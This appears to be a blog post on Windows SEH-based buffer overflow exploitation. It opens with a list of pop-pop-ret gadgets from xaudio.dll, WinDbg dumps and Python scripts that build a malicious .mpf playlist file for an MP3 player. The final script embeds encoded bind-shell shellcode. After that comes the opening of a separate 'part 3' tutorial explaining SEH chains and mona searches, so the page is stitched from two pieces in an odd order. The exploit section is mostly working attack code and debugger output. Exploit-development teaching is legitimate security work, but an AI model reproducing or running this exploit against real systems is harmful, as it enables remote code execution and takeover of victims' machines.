0x1000e0f4 pop esi; pop ebx; ret
0x1000e0fd pop esi; pop ebx; ret
0x1000e104 pop esi; pop ebx; ret
0x1000e290 pop ebp; pop ebx; ret
0x1000e2d5 pop ebp; pop ebx; ret
0x1000e2df pop ebp; pop ebx; ret
0x1000e2ee pop ebp; pop ebx; ret
0x1000e2fb pop ebp; pop ebx; ret
0x1000ea37 pop esi; pop ecx; ret
0x1000ea80 pop edi; pop esi; retn 0x0004
0x1000ea8a pop edi; pop esi; retn 0x0004
0x1000ea94 pop edi; pop esi; retn 0x0004
0x1000eaa4 pop edi; pop esi; retn 0x0004
0x1000eacb pop edi; pop esi; ret
0x1000eb0a pop edi; pop esi; ret
0x1000eb84 pop edi; pop esi; ret
0x1000fcde pop ebp; pop ebx; ret
0x1000fe66 pop ebp; pop ebx; ret
0x10010328 pop esi; pop ebx; ret
0x100103ae pop edi; pop esi; ret
0x100103c5 pop edi; pop esi; ret
0x1001095f pop ebp; pop ebx; ret
0x10010a25 pop ebp; pop ebx; ret
0x10010b12 pop ebp; pop ebx; ret
0x10010c7d pop ebp; pop ebx; ret
0x10010f64 pop ebp; pop ebx; ret
0x100111a4 pop ebp; pop ebx; ret
0x1001131e pop ebp; pop ebx; ret
0x100115ad pop ebp; pop ebx; ret
0x10011617 pop ebp; pop ebx; ret
0x10012cb6 pop ebp; pop ebx; ret
0x10012d15 pop edi; pop ebp; ret
0x10012d68 pop edi; pop esi; ret
0x10012dbe pop edi; pop esi; ret
0x10012e7f pop edi; pop esi; ret
0x10012e89 pop edi; pop esi; ret
0x10012ef7 pop ebp; pop ebx; ret
0x10012f6c pop ebp; pop ebx; ret
0x10012feb pop ebp; pop ebx; ret
0x10013072 pop ebp; pop ebx; ret
0x100130a9 pop ebp; pop ebx; ret
0x100132fd pop ebp; pop ebx; ret
0x1001372e pop ebp; pop ebx; ret
0x10013853 pop ebp; pop ebx; ret
0x10014156 pop ebp; pop ebx; ret
0x10014241 pop ebp; pop ebx; ret
0x1001430d pop ebp; pop ebx; ret
0x100143a4 pop edi; pop esi; ret
0x10014449 pop ebp; pop ebx; ret
0x100144de pop ebp; pop ebx; ret
0x10014599 pop ebp; pop ebx; ret
0x1001469e pop ebp; pop ebx; ret
0x100146e6 pop ebp; pop ebx; ret
0x10014a39 pop ebp; pop ebx; ret
0x10014ace pop ebp; pop ebx; ret
0x10014c1f pop ebp; pop ebx; retn 0x000c
0x10014c59 pop ebp; pop ebx; retn 0x000c
0x10014ca8 pop ebp; pop ebx; retn 0x000c
0x10014e41 pop ebp; pop ebx; ret
0x10014e48 pop ebp; pop ebx; ret
0x10014e98 pop esi; pop ecx; ret
0x10014eb5 pop esi; pop ecx; ret
0x10014f21 pop edi; pop esi; ret
0x10014f6f pop edi; pop esi; ret
0x10014f82 pop edi; pop esi; ret
0x10015087 pop esi; pop edi; ret
0x1001512b pop esi; pop edi; ret
0x10015296 pop edi; pop esi; ret
0x10015374 pop edi; pop esi; ret
0x10015498 pop edi; pop esi; ret
0x100154ba pop edi; pop esi; ret
0x100154ff pop edi; pop esi; ret
0x10015522 pop edi; pop esi; ret
0x10015564 pop edi; pop esi; ret
0x10015593 pop ebx; pop ecx; ret
0x10015661 pop ebx; pop ecx; ret
0x1001567c pop ebx; pop ecx; ret
0x10015697 pop ebx; pop ecx; ret
0x100156a9 pop ebx; pop ecx; ret
0x100156df pop edi; pop esi; ret
0x10015773 pop edi; pop esi; ret
0x100157c4 pop edi; pop esi; ret
0x100157f3 pop ebx; pop ecx; ret
0x100158e6 pop ebx; pop ecx; ret
0x10015901 pop ebx; pop ecx; ret
0x10015913 pop ebx; pop ecx; ret
0x10015a8a pop ebp; pop ebx; ret
0x10015a9f pop ebp; pop ebx; ret
0x10015aed pop edi; pop esi; ret
0x10015f08 pop edi; pop esi; ret
0x10015fa6 pop ebp; pop ebx; ret
0x1001607b pop edi; pop ebx; ret
0x10016082 pop edi; pop ebx; ret
0x10016089 pop edi; pop ebx; ret
0x100161a1 pop edi; pop esi; ret
0x100161b7 pop edi; pop esi; ret
0x100164dc pop ebp; pop ebx; ret
0x100165cb pop ebx; pop ecx; ret
0x10016e61 pop ebp; pop ebx; ret
0x10016e6f pop ebp; pop ebx; ret
0x10016eba pop ebp; pop ebx; ret
0x10016edc pop ebp; pop ebx; ret
0x10016f64 pop edi; pop esi; ret
0x100172b2 pop ebp; pop ebx; ret
0x100172c0 pop ebp; pop ebx; ret
0x10017ce6 pop ebp; pop ebx; ret
0x10017d2a pop ebp; pop ebx; ret
0x10017e4f pop edi; pop esi; ret
0x10017ed3 pop edi; pop ebp; ret
0x10018114 pop esi; pop ebp; ret
0x1001827a pop ebp; pop ebx; ret
0x1001840e pop ebx; pop ecx; ret
0x10018427 pop ebx; pop ecx; ret
0x1001852a pop ebx; pop ecx; ret
0x10018568 pop ebx; pop ecx; ret
0x10018570 pop ebx; pop ecx; ret
0x100185d8 pop ebp; pop ebx; ret
0x100186b4 pop ebp; pop ebx; ret
0x100186e8 pop ebp; pop ebx; ret
0x1001874a pop ebp; pop ebx; ret
0x100187c1 pop ebp; pop ebx; ret
0x10018b2f pop ebp; pop ebx; ret
0x10018c63 pop ebp; pop ebx; ret
0x10018dc6 pop edi; pop esi; ret
0x10018e77 pop esi; pop ebx; ret
0x10018eb9 pop ecx; pop ebx; retn 0x0004
0x10018f54 pop ebp; pop ebx; ret
0x10019053 pop ebp; pop ebx; ret
0x100191d6 pop ebp; pop ebx; ret
0x10019270 pop esi; pop ebp; ret
0x10019311 pop esi; pop ebx; ret
0x1001932b pop esi; pop ebx; ret
0x100193f8 pop ebx; pop ecx; ret
0x10019449 pop edi; pop esi; ret
0x100194f8 pop edi; pop esi; ret
0x10019565 pop edi; pop esi; ret
0x1001960d pop edi; pop esi; ret
0x10019683 pop edi; pop esi; ret
0x10019933 pop edi; pop esi; ret
0x10019982 pop edi; pop esi; ret
0x100199b9 pop edi; pop esi; ret
0x100199dd pop edi; pop esi; ret
0x10019be3 pop edi; pop esi; ret
0x1001ac35 pop esi; pop ebx; ret
0x1001acb2 pop esi; pop edi; ret
0x1001acbf pop esi; pop edi; ret
0x1001adf2 pop esi; pop ecx; ret
0x1001ae50 pop esi; pop ecx; ret
0x1001aee2 pop esi; pop edi; ret
0x1001aeef pop esi; pop edi; ret
0x1001b0b0 pop edi; pop esi; ret
0x1001b1de pop ebp; pop ebx; ret
0x1001b228 pop ebp; pop ebx; ret
0x1001b23f pop ebp; pop ebx; ret
0x1001b2c9 pop ebp; pop ebx; ret
0x1001b3e6 pop ebx; pop ecx; ret
0x1001b430 pop ebx; pop ecx; ret
0x1001b449 pop ebx; pop ecx; ret
0x1001b4f1 pop ebx; pop ecx; ret
0x1001b568 pop ebx; pop ecx; ret
0x1001b5f4 pop ebx; pop ecx; ret
0x1001b609 pop ebx; pop ecx; ret
0x1001b635 pop ebx; pop ecx; ret
0x1001b6e6 pop esi; pop ebx; ret
0x1001b7dc pop esi; pop ebx; ret
0x1001b7e9 pop esi; pop ebx; ret
0x1001b8d3 pop esi; pop ebx; retn 0x0010
0x1001bbc6 pop esi; pop ebx; ret
0x1001bc6a pop ebx; pop ecx; ret
0x1001c07c pop ebp; pop ebx; ret
0x1001c09e pop ebp; pop ebx; ret
0x1001c1a8 pop ebp; pop ebx; ret
0x1001c1fb pop ebp; pop ebx; ret
0x1001ca59 pop esi; pop ebp; ret
0x1001cc39 pop esi; pop ebx; ret
0x1001cc4d pop esi; pop ebx; ret
0x1001cc61 pop esi; pop ebx; ret
0x1001cd03 pop esi; pop ebx; ret
0x1001cde2 pop esi; pop ebx; ret
0x1001ce81 pop esi; pop ebx; ret
0x1001ce8e pop esi; pop ebx; ret
0x1001ced3 pop edi; pop esi; ret
0x1001cef8 pop edi; pop esi; ret
0x1001cf5a pop edi; pop esi; ret
0x1001cf8e pop edi; pop esi; ret
0x1001cf96 pop edi; pop esi; ret
0x1001cf9b pop edi; pop esi; ret
0x1001d048 pop esi; pop ebx; ret
0x1001d06a pop esi; pop ebx; ret
0x1001d151 pop ebp; pop ebx; ret
0x1001d49e pop ebp; pop ebx; ret
0x1001d89b pop esi; pop ebx; ret
0x1001d969 pop esi; pop ebx; ret
0x1001d999 pop esi; pop ebx; ret
0x1001d9c2 pop esi; pop ebx; ret
0x1001daf6 pop esi; pop ebx; ret
0x1001dc28 pop esi; pop ebx; ret
0x1001e0c5 pop edi; pop esi; ret
0x1001f668 pop ebp; pop ecx; ret
0x1001f808 pop ebp; pop ecx; ret
0x1001f816 pop ebp; pop ecx; ret
0x1001f825 pop ebp; pop ecx; ret
0x1001f86d pop edi; pop esi; ret
0x1001fa5b pop edi; pop esi; ret
0x1001fa70 pop edi; pop esi; ret
0x1001faac pop edi; pop esi; ret
0x1001fabe pop edi; pop esi; ret
0x1001fbf1 pop ebp; pop ebx; ret
0x1001fc4d pop ebp; pop ebx; ret
0x1001fc69 pop ebp; pop ebx; ret
0x1001fcd5 pop ebp; pop ebx; ret
0x1001fd0f pop ebp; pop ebx; ret
0x1001fd23 pop ebp; pop ebx; ret
0x1001fd61 pop ebp; pop ebx; ret
0x1001fd8d pop ebp; pop ebx; ret
0x1001fd9d pop ebp; pop ebx; ret
0x1001fe05 pop ebp; pop ebx; ret
0x1001fe3f pop ebp; pop ebx; ret
0x1001fe56 pop ebp; pop ebx; ret
0x1001fe9d pop ebp; pop ebx; ret
0x1001fecc pop ebp; pop ebx; ret
0x1001fedc pop ebp; pop ebx; ret
0x1001ff41 pop esi; pop ebx; ret
0x1001ff4e pop esi; pop ebx; ret
0x1001ff7e pop ebx; pop ecx; ret
0x1001ffc7 pop ebx; pop ecx; ret
0x10020028 pop ebx; pop ecx; ret
0x10020064 pop ebx; pop ecx; ret
0x100200e1 pop ebx; pop ecx; ret
0x100200fd pop ebx; pop ecx; ret
0x10020133 pop ebx; pop ecx; ret
0x10020147 pop ebx; pop ecx; ret
0x10020209 pop ebp; pop ebx; ret
0x10020214 pop ebp; pop ebx; ret
0x100202c8 pop ebp; pop ebx; ret
0x100202d0 pop ebp; pop ebx; ret
0x100205d7 pop edi; pop esi; ret
0x1002065b pop ebx; pop ecx; ret
0x10020667 pop ebx; pop ecx; ret
0x10020793 pop ebx; pop ecx; ret
0x1002079b pop ebx; pop ecx; ret
0x100207a4 pop ebx; pop ecx; ret
0x1002083d pop esi; pop ebx; ret
0x1002084e pop esi; pop ebx; ret
0x100208dc pop esi; pop edi; ret
0x10020aaf pop esi; pop ebx; ret
0x10020b2e pop esi; pop ebx; ret
0x10020b3e pop esi; pop ebx; ret
0x10020b4f pop esi; pop ebx; ret
0x10020ba7 pop esi; pop ebx; ret

xaudio.dll, one of the application dll’s, contains multiple pop pop ret’s. We’ll use the one at 0x1002083D .

If the payload is after seh, (and the application stopped at our break), then EIP should now point to the first byte of nseh (our breakpoint code), and thus a dump eip should show nseh, followed by seh, followed by the shellcode :

(d74.cc4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0012fba4 ebx=0012fba4 ecx=00000000 edx=44444444 esi=0012eb7c edi=00fabf98
eip=00403734 esp=0012eb68 ebp=0012fbac iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x3734:
00403734 8b4af8          mov     ecx,dword ptr [edx-8] ds:0023:4444443c=????????
0:000> g
(d74.cc4): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=0012e880 ecx=1002083d edx=7c9032bc esi=7c9032a8 edi=00000000
eip=0012fb8c esp=0012e7a4 ebp=0012e7b8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
0012fb8c cc              int     3
0:000> d eip
0012fb8c  cc cc cc cc 3d 08 02 10-44 44 44 44 44 44 44 44  ....=...DDDDDDDD
0012fb9c  44 44 44 44 44 44 44 44-00 00 00 00 44 44 44 44  DDDDDDDD....DDDD
0012fbac  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fbbc  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fbcc  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fbdc  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fbec  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fbfc  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD

Ok, that looks promising, however we can see some null bytes after about 32bytes (in blue)… so we have 2 options : use the 4 bytes of code at nseh to jump over seh, and then use those 16 bytes to jump over the null bytes. Or jump directly from nseh to the shellcode.

First, let’s verify that we are really looking at the start of the shellcode (by replacing the first D’s with some easily recognized data) :

#!/usr/bin/env python
# -*- coding: utf8 -*-

from struct import pack


totalsize = 5005
fpath = "c0d3r.mpf"
junk = "http:AA%s" % ("A" * 4105)
nseh = "\xcc\xcc\xcc\xcc" # Software Breakpoint
seh = pack("L", 0x1002083D)
shellcode = "A123456789B123456789C123456789D123456789"

buf1 = "%s%s%s%s" % (junk, nseh, seh, shellcode)

junk2 = "D" * (totalsize - len(buf1))
payload = "%s%s" % (buf1, junk2)

print "[+] Writing exploit file %s" % fpath
with open(fpath, "w") as f:
    f.write(payload)

print "[+] File written\n"

exception information:

(49c.a14): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=0012e880 ecx=1002083d edx=7c9032bc esi=7c9032a8 edi=00000000
eip=0012fb8c esp=0012e7a4 ebp=0012e7b8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
0012fb8c cc              int     3
0:000> d eip
0012fb8c  cc cc cc cc 3d 08 02 10-41 31 32 33 34 35 36 37  ....=...A1234567
0012fb9c  38 39 42 31 32 33 34 35-00 00 00 00 43 31 32 33  89B12345....C123
0012fbac  34 35 36 37 38 39 44 31-32 33 34 35 36 37 38 39  456789D123456789
0012fbbc  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fbcc  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fbdc  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fbec  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fbfc  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD

Ok, so it is the beginning of the shellcode, but there is a little “hole” after the first couple of shellcode bytes… (see null bytes in red) Let’s say we want to jump over the hole, and start the shellcode with 4 NOP’s (so we can put our real shellcode at 0012fbac… basically use 24 NOP’s in total before the shellcode), then we need to jump (from nseh) 30 bytes. (That’s 0xeb,0x1e), then we can do this :

#!/usr/bin/env python
# -*- coding: utf8 -*-

from struct import pack


totalsize = 5005
fpath = "c0d3r.mpf"
junk = "http:AA%s" % ("A" * 4105)
nseh = "\xEB\x1E\x90\x90"         # Software Breakpoint
seh = pack("L", 0x1002083D)
nops = "\x90" * 24

shellcode = "\xcc\xcc\xcc\xcc"

buf1 = "%s%s%s%s%s" % (junk, nseh, seh, nops, shellcode)

junk2 = "D" * (totalsize - len(buf1))
payload = "%s%s" % (buf1, junk2)

print "[+] Writing exploit file %s" % fpath
with open(fpath, "w") as f:
    f.write(payload)

print "[+] File written\n"

Open the mpf file and you should be stopped at the breakpoint (at 0x0012f9c0) after passing the first exception to the application :

0:000> !exchain
0012e7ac: ntdll!ExecuteHandler2+3a (7c9032bc)
0012fb8c: *** WARNING: Unable to verify checksum for C:\mp3-millennium\xaudio.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\mp3-millennium\xaudio.dll -
xaudio!xaudio_get_api_version+15f6d (1002083d)
Invalid exception stack at 90901eeb
0:000> d 0012fb8c
0012fb8c  eb 1e 90 90 3d 08 02 10-90 90 90 90 90 90 90 90  ....=...........
0012fb9c  90 90 90 90 90 90 90 90-00 00 00 00 90 90 90 90  ................
0012fbac  cc cc cc cc 44 44 44 44-44 44 44 44 44 44 44 44  ....DDDDDDDDDDDD
0012fbbc  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fbcc  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fbdc  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fbec  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fbfc  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0:000> d eip
0012fbac  cc cc cc cc 44 44 44 44-44 44 44 44 44 44 44 44  ....DDDDDDDDDDDD
0012fbbc  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fbcc  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fbdc  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fbec  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fbfc  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fc0c  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD
0012fc1c  44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44  DDDDDDDDDDDDDDDD

Ok, now replace the breaks with real shellcode and finalize the script :

#!/usr/bin/env python
# -*- coding: utf8 -*-

from struct import pack


totalsize = 5005
fname = "c0d3r.mpf"
junk = "http:AA"
junk = "%s%s" % (junk, "A" * 4105)

# nseh = "BBBB"
nseh = "\xEB\x1E\x90\x90"
# seh = "CCCC"
seh = pack("L", 0x1002083D)

nops = "\x90" * 24

# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=8080, RHOST=127.0.0.1,
# PrependMigrate=false, EXITFUNC=seh, InitialAutoRunScript=,
# AutoRunScript=
buf =  ""
buf += "\xdb\xc0\xd9\x74\x24\xf4\xbb\xc2\xb8\x9a\xc4\x5f\x31"
buf += "\xc9\xb1\x53\x31\x5f\x17\x83\xef\xfc\x03\x9d\xab\x78"
buf += "\x31\xdd\x24\xfe\xba\x1d\xb5\x9f\x33\xf8\x84\x9f\x20"
buf += "\x89\xb7\x2f\x22\xdf\x3b\xdb\x66\xcb\xc8\xa9\xae\xfc"
buf += "\x79\x07\x89\x33\x79\x34\xe9\x52\xf9\x47\x3e\xb4\xc0"
buf += "\x87\x33\xb5\x05\xf5\xbe\xe7\xde\x71\x6c\x17\x6a\xcf"
buf += "\xad\x9c\x20\xc1\xb5\x41\xf0\xe0\x94\xd4\x8a\xba\x36"
buf += "\xd7\x5f\xb7\x7e\xcf\xbc\xf2\xc9\x64\x76\x88\xcb\xac"
buf += "\x46\x71\x67\x91\x66\x80\x79\xd6\x41\x7b\x0c\x2e\xb2"
buf += "\x06\x17\xf5\xc8\xdc\x92\xed\x6b\x96\x05\xc9\x8a\x7b"
buf += "\xd3\x9a\x81\x30\x97\xc4\x85\xc7\x74\x7f\xb1\x4c\x7b"
buf += "\xaf\x33\x16\x58\x6b\x1f\xcc\xc1\x2a\xc5\xa3\xfe\x2c"
buf += "\xa6\x1c\x5b\x27\x4b\x48\xd6\x6a\x04\xbd\xdb\x94\xd4"
buf += "\xa9\x6c\xe7\xe6\x76\xc7\x6f\x4b\xfe\xc1\x68\xac\xd5"
buf += "\xb6\xe6\x53\xd6\xc6\x2f\x90\x82\x96\x47\x31\xab\x7c"
buf += "\x97\xbe\x7e\xe8\x9f\x19\xd1\x0f\x62\xd9\x81\x8f\xcc"
buf += "\xb2\xcb\x1f\x33\xa2\xf3\xf5\x5c\x4b\x0e\xf6\x7d\x1c"
buf += "\x87\x10\xeb\x0c\xce\x8b\x83\xee\x35\x04\x34\x10\x1c"
buf += "\x3c\xd2\x59\x76\xfb\xdd\x59\x5c\xab\x49\xd2\xb3\x6f"
buf += "\x68\xe5\x99\xc7\xfd\x72\x57\x86\x4c\xe2\x68\x83\x26"
buf += "\x87\xfb\x48\xb6\xce\xe7\xc6\xe1\x87\xd6\x1e\x67\x3a"
buf += "\x40\x89\x95\xc7\x14\xf2\x1d\x1c\xe5\xfd\x9c\xd1\x51"
buf += "\xda\x8e\x2f\x59\x66\xfa\xff\x0c\x30\x54\x46\xe7\xf2"
buf += "\x0e\x10\x54\x5d\xc6\xe5\x96\x5e\x90\xe9\xf2\x28\x7c"
buf += "\x5b\xab\x6c\x83\x54\x3b\x79\xfc\x88\xdb\x86\xd7\x08"
buf += "\xe5\x77\xe5\x84\x72\x2e\x9c\xe4\x1e\xd1\x4b\x2a\x27"
buf += "\x52\x79\xd3\xdc\x4a\x08\xd6\x99\xcc\xe1\xaa\xb2\xb8"
buf += "\x05\x18\xb2\xe8"

junk2 = "D" * (totalsize - len("%s%s%s%s%s" % (junk, nseh, seh, nops, buf)))
payload = "%s%s%s%s%s%s" % (junk, nseh, seh, nops, buf, junk2)

print "[+] Writing exploit file %s" % fname
with open(fname, "w") as f:
    f.write(payload)

print "[+] File written\n"

Pwned !

Tuesday, June 9, 2015

Exploit writing tutorial part3: SEH Based Exploits

Exploit writing tutorial part3 - SEH Based Exploits In the first 2 parts of the exploit writing tutorial series, I have discussed how a classic stack buffer overflow works and how you can build a reliable exploit by using various techniques to jump to the shellcode. The example we have used allowed us to directly overwrite EIP and we had a pretty large buffer space to host our shellcode. On top of that, we had the ability to use multiple jump techniques to reach our goal. But not all overflows are that easy.

Today, we’ll look at another technique to go from vulnerability to exploit, by using exception handlers.

What are exception handlers ?

An exception handler is a piece of code that is written inside an application, with the purpose of dealing with the fact that the application throws an execption. A typical exception handler looks like this :

try
{
  //run stuff.  If an exception occurs, go to <catch> code
}
catch
{
  // run stuff when exception occurs
}

A quick look on the stack on how the try & catch blocks are related to each other and placed on the stack :

         Top of stack -> --------------------------
                         |                        |
                         |                        |
                         -------------------------- ----|
                         |      Local vars        |     |
                         --------------------------     |
                         |      Saved EBP         |     |
                         --------------------------      \  This is the frame with
                         |      Saved EIP         |      /  Exception Handling
                         --------------------------     |
                         |      Params            |     |   try { ... }
Exception       |----    -------------------------- ----|
Handler        /         |  Address of exception  |     
               \         |  Handler               |     
catch { ....}   |----    -------------------------- ----|
                         |                        |     |
                         |                        |      \  More frames
                         |                        |      /
                         |                        |     |
     Bottom of stack ->  -------------------------- ----|

(Note : "Address of exception handler" is just one part of a SEH record – the image above is an abstract representation, merely showing the various components)

Windows has a default SEH (Structured Exception Handler) which will catch exceptions. If Windows catches an exception, you’ll see a “xxx has encountered a problem and needs to close” popup. This is often the result of the default handler kicking in. It is obvious that, in order to write stable software, one should try to use development language specific exception handlers, and only rely on the windows default SEH as a last resort. When using language EH’s, the necessary links and calls to the exception handling code are generate in accordance with the underlying OS. (and when no exception handlers are used, or when the available exception handlers cannot process the exception, the Windows SEH will be used. (UnhandledExceptionFilter)). So in the event an error or illegal instruction occurs, the application will get a chance to catch the exception and do something with it. If no exception handler is defined in the application, the OS takes over, catches the exception, shows the popup (asking you to Send Error Report to MS).

In order for the application to be able to go to the catch code, the pointer to the exception handler code is saved on the stack (for each code block). Each code block has its own stack frame, and the pointer to the exception handler is part of this stack frame. In other words : Each function/procedure gets a stack frame. If an exception handler is implement in this function/procedure, the exception handler gets its own stack frame. Information about the frame-based exception handler is stored in an exception_registration structure on the stack.

This structure ( also called a SEH record) is 8 bytes and has 2 (4 byte) elements :

a pointer to the next exception_registration structure (in essence, to the next SEH record, in case the current handler is unable the handle the exception)
a pointer, the address of the actual code of the exception handler. (SE Handler)

Simple stack view on the SEH chain components :

                             Stack

            -------------------------------------------  <- Top
            |                                         |
            |                                         |
         ----  ---------------------------------      |
4 bytes  |     |  Pointer to Next SEH record   | -->  |
         |     ---------------------------------   |  |        -------------------------
4 bytes  |     |  Pointer to Exception Handler |-------------  | Exception_handler1()  |
         ----  ---------------------------------   |  |        -------------------------
            |                                      |  |
            |                                      |  |
         ----  --------------------------------- <-|  |
4 bytes  |     |  Pointer to Next SEH record   | ->>  |
         |     ---------------------------------   |  |        -------------------------
4 bytes  |     |  Pointer to Exception Handler |-------------  | Exception_handler2()  |
         ----  ---------------------------------   |  |        -------------------------
            |                                      |  |
            |                                      |  |
         ----  --------------------------------- <<-  |
4 bytes  |     |  Pointer to Next SEH record   | -->  |
         |     ---------------------------------   |  |        -------------------------
4 bytes  |     |  Pointer to Exception Handler |-------------  | Exception_handler3()  |
         ----  ---------------------------------   |  |        -------------------------
            |                                      |  |
            |                                      |  |
         ----  ---------------------------------   |  |
4 bytes  |     |  0xFFFFFFFF                   | <--  |
         |     ---------------------------------      |        -------------------------
4 bytes  |     |  Pointer to Exception Handler |-------------  | MSVCRT!exhandler      |
         ----  ---------------------------------      |        -------------------------
            |                                         |
            |                                         |
            |                                         |
            |                                         |
            |                                         |
            |                                         |
            |                                         |
            ------------------------------------------- <- Bottom

At the top of the main data block (the data block of the application’s “main” function, or TEB (Thread Environment Block) / TIB (Thread Information Block)), a pointer to the top of the SEH chain is placed. This SEH chain is often called the FS:[0] chain as well.
So, on Intel machines, when looking at the disassembled SEH code, you will see an instruction to move DWORD ptr from FS:[0]. This ensures that the exception handler is set up for the thread and will be able to catch errors when they occur. The opcode for this instruction is 64A100000000. If you cannot find this opcode, the application/thread may not have exception handling at all.
we can find 64A100000000 with mona.

0BADF00D   [+] Command used:
0BADF00D   !mona find -type bin -s "64A100000000"

           ---------- Mona command started on 2015-06-08 18:36:11 (v2.0, rev 554) ----------
0BADF00D   [+] Processing arguments and criteria
0BADF00D       - Pointer access level : *
0BADF00D       - Treating search pattern as bin
0BADF00D   [+] Searching from 0x00000000 to 0x7fffffff
5AD70000   Modules C:\WINDOWS\system32\UxTheme.dll
0BADF00D   [+] Preparing output file 'find.txt'
0BADF00D       - (Re)setting logfile C:\logs\notepad\find.txt
0BADF00D   [+] Generating module info table, hang on...
0BADF00D       - Processing modules
0BADF00D       - Done. Let's rock 'n roll.
0BADF00D   [+] Writing results to C:\logs\notepad\find.txt
0BADF00D       - Number of pointers of type '"64A100000000"' : 35
0BADF00D   [+] Results :
77F83185     0x77f83185 : "64A100000000" |  {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHLWAPI.dll)
77BE2DF1     0x77be2df1 : "64A100000000" |  {PAGE_EXECUTE_READ} [MSACM32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\MSACM32.dll)
7C8024DB     0x7c8024db : "64A100000000" |  {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\kernel32.dll)
6F8A6414     0x6f8a6414 : "64A100000000" |  {PAGE_EXECUTE_READ} [AcGenral.DLL] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\AppPatch\AcGenral.DLL)
6F8A669D     0x6f8a669d : "64A100000000" |  {PAGE_EXECUTE_READ} [AcGenral.DLL] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\AppPatch\AcGenral.DLL)
6F8A67EF     0x6f8a67ef : "64A100000000" |  {PAGE_EXECUTE_READ} [AcGenral.DLL] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\AppPatch\AcGenral.DLL)
6F8A6F91     0x6f8a6f91 : "64A100000000" |  {PAGE_EXECUTE_READ} [AcGenral.DLL] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\AppPatch\AcGenral.DLL)
7C9033F8     0x7c9033f8 : "64A100000000" |  {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ntdll.dll)
7C90E8B0     0x7c90e8b0 : "64A100000000" |  {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ntdll.dll)
77F18035     0x77f18035 : "64A100000000" |  {PAGE_EXECUTE_READ} [GDI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\GDI32.dll)
5CB7DAED     0x5cb7daed : "64A100000000" |  {PAGE_EXECUTE_READ} [ShimEng.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\ShimEng.dll)
730012D5     0x730012d5 : "64A100000000" | null {PAGE_EXECUTE_READ} [WINSPOOL.DRV] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\WINSPOOL.DRV)
